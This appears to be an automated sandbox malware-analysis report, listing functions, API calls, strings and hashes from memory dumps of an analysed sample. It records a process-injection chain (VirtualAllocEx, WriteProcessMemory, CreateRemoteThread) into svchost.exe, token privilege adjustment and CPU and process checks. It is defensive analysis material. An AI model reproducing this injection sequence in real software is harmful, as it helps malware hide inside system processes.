Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenWow64lstrcmplstrcmpi
String ID: svchost.exe
API String ID: 3729492079-3106260013
Opcode ID: 33da84bf9f84fb48db419fc368e239f97e1856f174b6db6527ae77252b71042d
Instruction ID: 2d77411b93c241b00efbc5ac71defe2a5244fe2b77d54806d9543acc104424f7
Opcode Fuzzy Hash: 33da84bf9f84fb48db419fc368e239f97e1856f174b6db6527ae77252b71042d
Instruction Fuzzy Hash: 3D117C63B24A4682EAA09F11A8647A96351BB55F84F448034CE0DC7790EF3EAC4BD705

Function 00007FF6E5341CE0 Relevance: 1.3, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00007FF6E5341D41

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 02a91111e02b6d17f80dd5bfa3117c19c37dfd37fc44594caa9d929acb6c5c95
Instruction ID: e3e7f4aa5a66a0397608b3d0a84ed767771a54fa77100f68a2c1e71b5582806a
Opcode Fuzzy Hash: 02a91111e02b6d17f80dd5bfa3117c19c37dfd37fc44594caa9d929acb6c5c95
Instruction Fuzzy Hash: 39F0C863B1894901F9759A22682877D42412F96FE0F448330ED3CDA3C6FD3ED807830A

Function 00007FF6E5342102 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76
filestringsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6E534202E: OpenProcess.KERNEL32(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E5342061
Part of subcall function 00007FF6E534202E: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E5342083
Part of subcall function 00007FF6E534202E: ExpandEnvironmentStringsForUserW.USERENV(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E534209F
Part of subcall function 00007FF6E534202E: lstrlenW.KERNEL32(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E53420AC
Part of subcall function 00007FF6E534202E: CloseHandle.KERNEL32(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E53420C1
Part of subcall function 00007FF6E534202E: CloseHandle.KERNEL32(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E53420CA

CreateMutexExW.KERNELBASE ref: 00007FF6E534215D
lstrcatW.KERNEL32 ref: 00007FF6E5342175
lstrcatW.KERNEL32 ref: 00007FF6E5342181
CreateFileW.KERNELBASE ref: 00007FF6E53421AD
lstrcatW.KERNEL32 ref: 00007FF6E53421C6
CreateFileMappingW.KERNEL32 ref: 00007FF6E53421EB
MapViewOfFile.KERNEL32 ref: 00007FF6E534220D

Strings

.tmp, xrefs: 00007FF6E5342177, 00007FF6E53421BC
\, xrefs: 00007FF6E5342136

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: CreateFilelstrcat$CloseHandleOpenProcess$EnvironmentExpandMappingMutexStringsTokenUserViewlstrlen
String ID: .tmp$\
API String ID: 2963383667-2394830877
Opcode ID: 8ae599a5a8c4644ae91a768ebe2e177b42768a182a460bb4e6538cdf2216fb1a
Instruction ID: 3e4f0dde971c2dd4559ef7f3ab3d40b5b4e1596fed58722f456945bd8288e286
Opcode Fuzzy Hash: 8ae599a5a8c4644ae91a768ebe2e177b42768a182a460bb4e6538cdf2216fb1a
Instruction Fuzzy Hash: 7731E422614A4282E7758F15F42876A63A0FB88BA4F448334DA9D937E4DF3ED94AC704

Function 00007FF6E534202E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6E5341CE0: CloseHandle.KERNELBASE ref: 00007FF6E5341D41

OpenProcess.KERNEL32(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E5342061
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E5342083
ExpandEnvironmentStringsForUserW.USERENV(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E534209F
lstrlenW.KERNEL32(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E53420AC
CloseHandle.KERNEL32(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E53420C1
CloseHandle.KERNEL32(?,?,?,?,?,?,00007FF6E5342129), ref: 00007FF6E53420CA

Strings

%TEMP%, xrefs: 00007FF6E5342092

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: CloseHandle$OpenProcess$EnvironmentExpandStringsTokenUserlstrlen
String ID: %TEMP%
API String ID: 2066944653-235365282
Opcode ID: c0b1680c4e13cad4beb039cd7c449280248dcf1c462ff82c215f3d7bf46a2f04
Instruction ID: 9eb76a6cd9fd37f8a3f4c47167b536e28f03280553cdbfafc118650036a2e422
Opcode Fuzzy Hash: c0b1680c4e13cad4beb039cd7c449280248dcf1c462ff82c215f3d7bf46a2f04
Instruction Fuzzy Hash: 0F118F23B1960A85E6705F52A86437A7790AF98F80F044034DE0ED3750EE3EEC4BD35A

Function 00007FF6E5341DDE Relevance: 7.6, APIs: 5, Instructions: 63
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32 ref: 00007FF6E5341DF8
GetTokenInformation.KERNELBASE ref: 00007FF6E5341E28
LookupAccountSidW.ADVAPI32 ref: 00007FF6E5341E83
lstrcpyW.KERNEL32 ref: 00007FF6E5341EB2
CloseHandle.KERNELBASE ref: 00007FF6E5341EBF

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: Token$AccountCloseHandleInformationLookupOpenProcesslstrcpy
String ID:
API String ID: 454061121-0
Opcode ID: e1d1f217c9350a821383d5d86a3fa50bc4f9439d00a3524fed5758a0b4ebb576
Instruction ID: 3a85c9ed3d1e917e93ba61446487ae37e44b13115b987c5777d71d65eef9e4fc
Opcode Fuzzy Hash: e1d1f217c9350a821383d5d86a3fa50bc4f9439d00a3524fed5758a0b4ebb576
Instruction Fuzzy Hash: 96218337618A81C6EB208F55E45039BB3A0FBD4B54F144136DA8DC3A44EF7ED88ADB09

Function 00007FF6E534224E Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF6E534225E
wsprintfW.USER32 ref: 00007FF6E5342276
WriteFile.KERNELBASE ref: 00007FF6E53422B4

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: CurrentFileProcessWritewsprintf
String ID:
API String ID: 93935769-0
Opcode ID: b8ffbd65c9557ee56dc00454cb98db942b7e180429998d7dff2a41c5c00b45f5
Instruction ID: eb2ed9ebbc04f4bb1b3896da23eed21a0132c877d40a6297bd28f7367dff22a9
Opcode Fuzzy Hash: b8ffbd65c9557ee56dc00454cb98db942b7e180429998d7dff2a41c5c00b45f5
Instruction Fuzzy Hash: E821C11372855181EB708F26D51037A72E1EBA4FA4F148230E95DD3694EF3EC847C745

Function 00007FF6E5341000 Relevance: 4.5, APIs: 3, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6E53411CB: GetCurrentProcess.KERNEL32 ref: 00007FF6E53411F0
Part of subcall function 00007FF6E53411CB: OpenProcessToken.ADVAPI32 ref: 00007FF6E5341201
Part of subcall function 00007FF6E53411CB: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6E534121C
Part of subcall function 00007FF6E53411CB: AdjustTokenPrivileges.KERNELBASE ref: 00007FF6E5341259
Part of subcall function 00007FF6E53411CB: CloseHandle.KERNELBASE ref: 00007FF6E5341267
Part of subcall function 00007FF6E53411CB: wsprintfW.USER32 ref: 00007FF6E5341298
Part of subcall function 00007FF6E53411CB: lstrlenW.KERNEL32 ref: 00007FF6E53412AF
Part of subcall function 00007FF6E53411CB: OpenProcess.KERNEL32 ref: 00007FF6E53412D5
Part of subcall function 00007FF6E53411CB: CloseHandle.KERNEL32 ref: 00007FF6E5341314
Part of subcall function 00007FF6E53411CB: wsprintfW.USER32 ref: 00007FF6E5341334
Part of subcall function 00007FF6E53411CB: wsprintfW.USER32 ref: 00007FF6E5341382

GetModuleHandleW.KERNEL32 ref: 00007FF6E534101B
GetModuleFileNameW.KERNEL32 ref: 00007FF6E5341032

Part of subcall function 00007FF6E5342700: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6E5341040), ref: 00007FF6E5342711
Part of subcall function 00007FF6E5342700: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6E5341040), ref: 00007FF6E534273B
Part of subcall function 00007FF6E5342700: VirtualAllocEx.KERNELBASE ref: 00007FF6E5342766
Part of subcall function 00007FF6E5342700: WriteProcessMemory.KERNELBASE ref: 00007FF6E5342790
Part of subcall function 00007FF6E5342700: VirtualProtectEx.KERNELBASE ref: 00007FF6E53427B6
Part of subcall function 00007FF6E5342700: CreateRemoteThread.KERNELBASE ref: 00007FF6E53427E9
Part of subcall function 00007FF6E5342700: CloseHandle.KERNEL32 ref: 00007FF6E53427F2
Part of subcall function 00007FF6E5342700: CloseHandle.KERNEL32 ref: 00007FF6E53427FB

ExitProcess.KERNEL32 ref: 00007FF6E5341042

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: Process$Handle$Close$Openwsprintf$ModuleTokenVirtual$AdjustAllocCreateCurrentExitFileLookupMemoryNamePrivilegePrivilegesProtectRemoteThreadValueWritelstrcpylstrlen
String ID:
API String ID: 2637963336-0
Opcode ID: aaa5e6f4dad646cce857e523ff3e35a1cc70af69005609f547148f43a76e9084
Instruction ID: 0fb99b9ad7c836699711f5edc4118caf04dd26e66ae9ce1709f0b70206f93c25
Opcode Fuzzy Hash: aaa5e6f4dad646cce857e523ff3e35a1cc70af69005609f547148f43a76e9084
Instruction Fuzzy Hash: 61E04F22B18906C2EA34AF31A92577E1262AF44FC4F004135D80FC7691DE3EE90BC70A

Function 00007FF6E5341F2F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpiW.KERNELBASE ref: 00007FF6E5341F46

Strings

explorer.exe, xrefs: 00007FF6E5341F3F

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: explorer.exe
API String ID: 1586166983-3187896405
Opcode ID: 1b0e4e659e91f1f507386cb126651616905f3ddf5d16604af09169ecff75ff3b
Instruction ID: f26c7a0422c259de32e4a2b352bda75db82b485623c7f501e0ced351dcde27bb
Opcode Fuzzy Hash: 1b0e4e659e91f1f507386cb126651616905f3ddf5d16604af09169ecff75ff3b
Instruction Fuzzy Hash: 65E0C272B10546C2EF58DF26E9A01A823B1AB18BA0B40D530CE0DC3304EE29DCDBC700

Non-executed Functions

Function 00007FF6E5341ED6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrcmpA.KERNEL32 ref: 00007FF6E5341F1E

Strings

GenuineIntel, xrefs: 00007FF6E5341F17

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: lstrcmp
String ID: GenuineIntel
API String ID: 1534048567-2798635751
Opcode ID: ceaa0ec54db178e2e6e231b194b85b8f26a8e5edac5ca1dec9d25f3ae3ce341f
Instruction ID: 89813dc580332624d3cfd37bbbb5264a6e19cfe178f44f050337d656fa386c30
Opcode Fuzzy Hash: ceaa0ec54db178e2e6e231b194b85b8f26a8e5edac5ca1dec9d25f3ae3ce341f
Instruction Fuzzy Hash: 5AF0B7B2A192408BD764CF29E04071ABBE0F78CB18F148229E64CC3764EB3DCA46CF04

Function 00007FF6E534104C Relevance: 10.6, APIs: 7, Instructions: 59
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpiW.KERNEL32 ref: 00007FF6E5341067
OpenProcess.KERNEL32 ref: 00007FF6E5341083
IsWow64Process.KERNEL32 ref: 00007FF6E534109C
QueryFullProcessImageNameW.KERNEL32 ref: 00007FF6E53410C3
lstrcmpiW.KERNEL32 ref: 00007FF6E53410D8
OpenProcess.KERNEL32 ref: 00007FF6E53410EF
CloseHandle.KERNEL32 ref: 00007FF6E53410FC

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: Process$Openlstrcmpi$CloseFullHandleImageNameQueryWow64
String ID:
API String ID: 1263184081-0
Opcode ID: 66efabd2308ca7e8cc47ad869a3164d51d343c317b94ac848e018b3e7f080cab
Instruction ID: 3609cb49f8595c23a9922e05948487eca07c90e83228be2689f89c27512b5b93
Opcode Fuzzy Hash: 66efabd2308ca7e8cc47ad869a3164d51d343c317b94ac848e018b3e7f080cab
Instruction Fuzzy Hash: C4116D37614A45C2E6609F26E8647B663A1EB48F95F048035DE4DC3750DF3EE84AD704

Function 00007FF6E5341F89 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32 ref: 00007FF6E5341FAC
lstrcatW.KERNEL32 ref: 00007FF6E5341FBC
lstrlenW.KERNEL32 ref: 00007FF6E5341FD2
StringFromGUID2.OLE32 ref: 00007FF6E5341FFF
lstrcpyW.KERNEL32 ref: 00007FF6E5342015

Strings

aaa, xrefs: 00007FF6E5341FB2

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: ComputerFromNameStringlstrcatlstrcpylstrlen
String ID: aaa
API String ID: 1214110813-4027020077
Opcode ID: 52da686e6899fcfdf271869b875d1c060a24513d856b41f7736baf8db8a6dc85
Instruction ID: 8597a9acb8b73056a865019ccf0f7f34c14eb04714752802065fc7e8ebb907f5
Opcode Fuzzy Hash: 52da686e6899fcfdf271869b875d1c060a24513d856b41f7736baf8db8a6dc85
Instruction Fuzzy Hash: B5018C62A1864681EA31AF16E9203FE2351AB89FD0F445131DE0EC7B94DE7ED94FC706

Function 00007FF6E5341D55 Relevance: 7.5, APIs: 5, Instructions: 43
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32 ref: 00007FF6E5341D6B
OpenServiceW.ADVAPI32 ref: 00007FF6E5341D85
QueryServiceStatusEx.ADVAPI32 ref: 00007FF6E5341DAF
CloseServiceHandle.ADVAPI32 ref: 00007FF6E5341DC1
CloseServiceHandle.ADVAPI32 ref: 00007FF6E5341DCE

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpen$ManagerQueryStatus
String ID:
API String ID: 2623946379-0
Opcode ID: f12b55399f81954735960b417d83d3d0fc8b8e9527ab447e852bf876cf722c8b
Instruction ID: de064dc8753ad06cfc6f320758b32e7ac297d365a83a0d9c6de0612668d9646f
Opcode Fuzzy Hash: f12b55399f81954735960b417d83d3d0fc8b8e9527ab447e852bf876cf722c8b
Instruction Fuzzy Hash: 03017123B1994582FA689F57A8102B662D1AFD4FD0F084034DD4EC3754EE3ED84B8705

Function 00007FF6E5341112 Relevance: 6.1, APIs: 4, Instructions: 55sleepmemoryCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF6E534114C
VirtualAllocEx.KERNEL32 ref: 00007FF6E5341168
wsprintfW.USER32 ref: 00007FF6E5341184

Part of subcall function 00007FF6E534224E: GetCurrentProcessId.KERNEL32 ref: 00007FF6E534225E
Part of subcall function 00007FF6E534224E: wsprintfW.USER32 ref: 00007FF6E5342276
Part of subcall function 00007FF6E534224E: WriteFile.KERNELBASE ref: 00007FF6E53422B4

VirtualFreeEx.KERNEL32 ref: 00007FF6E53411AA

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: Virtualwsprintf$AllocCurrentFileFreeProcessSleepWrite
String ID:
API String ID: 733823745-0
Opcode ID: bcbb75cb2b19442f071ed76d8045e1980bd2bdc914bd3c29063ed0a6d4f38a18
Instruction ID: 9f49cba53c4c2a5eba3599c2417dc65bacd8624beb357de04b48f59099115c72
Opcode Fuzzy Hash: bcbb75cb2b19442f071ed76d8045e1980bd2bdc914bd3c29063ed0a6d4f38a18
Instruction Fuzzy Hash: 9E010052B24A0295FB719B53BC20B7656406B54FD4F444030DD0D97BD4DE3EC84BD309

Analysis Process: svchost.exePID: 6568, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	1280
Total number of Limit Nodes:	8

Executed Functions

Function 0000000180003270 Relevance: 60.1, APIs: 18, Strings: 16, Instructions: 646sleepfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180001450: _wcsftime_l.LIBCMT ref: 00000001800014B7

Sleep.KERNEL32 ref: 0000000180003326
memchr.LIBCMT ref: 00000001800035E9
memchr.LIBCMT ref: 0000000180003700
fclose.LIBCMT ref: 00000001800037BF
CopyFileA.KERNEL32 ref: 00000001800038C9
TerminateProcess.KERNEL32 ref: 000000018000396C
CloseHandle.KERNEL32 ref: 0000000180003976
CloseHandle.KERNEL32 ref: 0000000180003980
wcsstr.LIBCMT ref: 0000000180003A19
DeleteFileW.KERNEL32 ref: 0000000180003A31
Sleep.KERNEL32 ref: 0000000180003A4A
SleepEx.KERNELBASE ref: 0000000180003AEB
SleepEx.KERNELBASE ref: 0000000180003C6F
ReleaseMutex.KERNEL32 ref: 0000000180003C9D
CloseHandle.KERNEL32 ref: 0000000180003CAA
ReleaseMutex.KERNEL32 ref: 0000000180003CBE
CloseHandle.KERNEL32 ref: 0000000180003CCB
CreateThread.KERNEL32 ref: 0000000180003CFD

Strings

>>>, xrefs: 000000018000334F
Expl, xrefs: 0000000180003B6C
2222, xrefs: 0000000180003315
3vp7f92rfoeq, xrefs: 00000001800032E6
\SysWOW64, xrefs: 000000018000354E
"C:\Program Files (x86)\Internet Explorer\ExtExport.exe", xrefs: 000000018000391C
3-2, xrefs: 0000000180003CDA
3-3, xrefs: 0000000180003C8A
SysWOW64, xrefs: 0000000180003A12
rb+, xrefs: 00000001800037AB
%d, xrefs: 00000001800039E5
orer, xrefs: 0000000180003B76
3-4, xrefs: 0000000180003C3A
!!3, xrefs: 0000000180003AD8
string too long, xrefs: 0000000180003A97
3-5, xrefs: 0000000180003B22

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: CloseHandleSleep$FileMutexReleasememchr$CopyCreateDeleteProcessTerminateThread_wcsftime_lfclosewcsstr
String ID: !!3$"C:\Program Files (x86)\Internet Explorer\ExtExport.exe"$%d$2222$3-2$3-3$3-4$3-5$3vp7f92rfoeq$>>>$Expl$SysWOW64$\SysWOW64$orer$rb+$string too long
API String ID: 1372095089-3246744611
Opcode ID: a144ad47c439805c793284aa70ae503fd3b9680167d1c7f0d7e8e273856873b8
Instruction ID: fe6398e0846a3c1e750943485bf1fe51f28c9368799a8c22a16bf7b62420f632
Opcode Fuzzy Hash: a144ad47c439805c793284aa70ae503fd3b9680167d1c7f0d7e8e273856873b8
Instruction Fuzzy Hash: 1A62CE32604A8889FB93CF25D8413ED37A5F7597E8F448216FA5A47AE9DF34C688C340

